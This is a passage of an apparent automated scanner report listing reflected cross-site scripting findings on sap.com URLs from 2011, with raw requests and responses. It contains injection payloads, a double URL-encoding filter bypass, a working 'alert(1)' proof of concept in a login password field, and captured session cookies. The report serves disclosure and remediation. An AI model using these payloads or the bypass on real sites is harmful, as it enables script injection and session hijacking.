X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:24 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:24 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservices9cd56';4de52bd1857';
var DOCUMENTNAME='Bridge';


var _s_cf17='Global';


</script>
...[SNIP]...

1.131. http://www.sap.com/news-reader/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /news-reader/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b521'%3b890d1e3b86c was submitted in the REST URL parameter 1. This input was echoed as 9b521';890d1e3b86c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news-reader9b521'%3b890d1e3b86c/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34066
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:47 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:47 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='news-reader9b521';890d1e3b86c';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.132. http://www.sap.com/print/global/ui/css/sapcom_countryselector.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /print/global/ui/css/sapcom_countryselector.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d4a0'%3b2ee006ae78a was submitted in the REST URL parameter 1. This input was echoed as 3d4a0';2ee006ae78a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /print3d4a0'%3b2ee006ae78a/global/ui/css/sapcom_countryselector.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='print3d4a0';2ee006ae78a';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.133. http://www.sap.com/sitemap.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /sitemap.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82dcd%2522a%253d%2522b%25221a0efd74c47 was submitted in the REST URL parameter 1. This input was echoed as 82dcd"a="b"1a0efd74c47 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sitemap.aspx82dcd%2522a%253d%2522b%25221a0efd74c47 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34397
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/sitemap.epx82dcd"a="b"1a0efd74c47" />
...[SNIP]...

1.134. http://www.sap.com/sitemap.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /sitemap.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a17e'%3b6316216be92 was submitted in the REST URL parameter 1. This input was echoed as 4a17e';6316216be92 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.aspx4a17e'%3b6316216be92 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34290
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:30 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:30 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:04:30 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='sitemap.epx4a17e';6316216be92?error=403&404;http:';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.135. http://www.sap.com/social/index.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /social/index.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885bd%2522a%253d%2522b%25226ba1d0ca90e was submitted in the REST URL parameter 2. This input was echoed as 885bd"a="b"6ba1d0ca90e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /social/index.aspx885bd%2522a%253d%2522b%25226ba1d0ca90e HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:08 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:08 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/social/index.epx885bd"a="b"6ba1d0ca90e" />
...[SNIP]...

1.136. http://www.sap.com/solutions/mobility-solutions/index.epx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /solutions/mobility-solutions/index.epx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf7b%2522a%253d%2522b%25222f512cd22da was submitted in the REST URL parameter 3. This input was echoed as 3cf7b"a="b"2f512cd22da in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /solutions/mobility-solutions/index.epx3cf7b%2522a%253d%2522b%25222f512cd22da HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 40813
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:43 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:43 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/solutions/mobility/index.epx3cf7b"a="b"2f512cd22da" />
...[SNIP]...

1.137. http://www.sap.com/text/global/ui/css/sapcom_countryselector.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /text/global/ui/css/sapcom_countryselector.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d498'%3b6186584efbc was submitted in the REST URL parameter 1. This input was echoed as 7d498';6186584efbc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /text7d498'%3b6186584efbc/global/ui/css/sapcom_countryselector.css HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34369
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:30 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:30 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='text7d498';6186584efbc';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.138. http://www.sap.com/usa/sme/index.epx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /usa/sme/index.epx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe06%2522a%253d%2522b%2522cd34d5824cc was submitted in the REST URL parameter 3. This input was echoed as 8fe06"a="b"cd34d5824cc in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /usa/sme/index.epx8fe06%2522a%253d%2522b%2522cd34d5824cc HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 44413
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:50 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=smeipcheck=1; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/sme/index.epx8fe06"a="b"cd34d5824cc" />
...[SNIP]...

1.139. http://www.sap.com/usa/sme/index.epx%20 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /usa/sme/index.epx%20

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c69b%2522a%253d%2522b%2522ffb1fd58d11 was submitted in the REST URL parameter 3. This input was echoed as 6c69b"a="b"ffb1fd58d11 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /usa/sme/index.epx%206c69b%2522a%253d%2522b%2522ffb1fd58d11 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 44407
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:56 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=smeipcheck=1; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:04:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/sme/index.epx6c69b"a="b"ffb1fd58d11" />
...[SNIP]...

1.140. https://www.sap.com/gwtservices/httpBridge.epx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c15b'%3bc3401e30041 was submitted in the REST URL parameter 1. This input was echoed as 1c15b';c3401e30041 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gwtservices1c15b'%3bc3401e30041/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; mbox=session#1321210845752-117832#1321213045|check#true#1321211245; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:10:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:10:40 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:10:40 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:10:40 GMT
Content-Length: 9370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservices1c15b';c3401e30041';
var DOCUMENTNAME='Bridge';
if(!ACTION) var ACTION;
ACTION='03';


var _s_cf17='Global';


</script>
...[SNIP]...

1.141. https://www.sap.com/profile/samlrequest.epx [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/samlrequest.epx

Issue detail

The value of the password request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2fdb'%3balert(1)//cf53a137865 was submitted in the password parameter. This input was echoed as f2fdb';alert(1)//cf53a137865 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /profile/samlrequest.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 23
Cache-Control: max-age=0
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjects%2fContent%2fpbPage.sap_countryselector%3fresid%3dTmOIUAoBAlUAAARDMJwAAAAN%26rests%3d1321211061712; mbox=session#1321210845752-117832#1321212928|check#true#1321211128; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; 37021986-VID=5110247826455; 37021986-SKEY=8052586457831773007; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

userid=xss&password=xssf2fdb'%3balert(1)//cf53a137865

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:08:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:08:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:09:00 GMT
Content-Length: 562

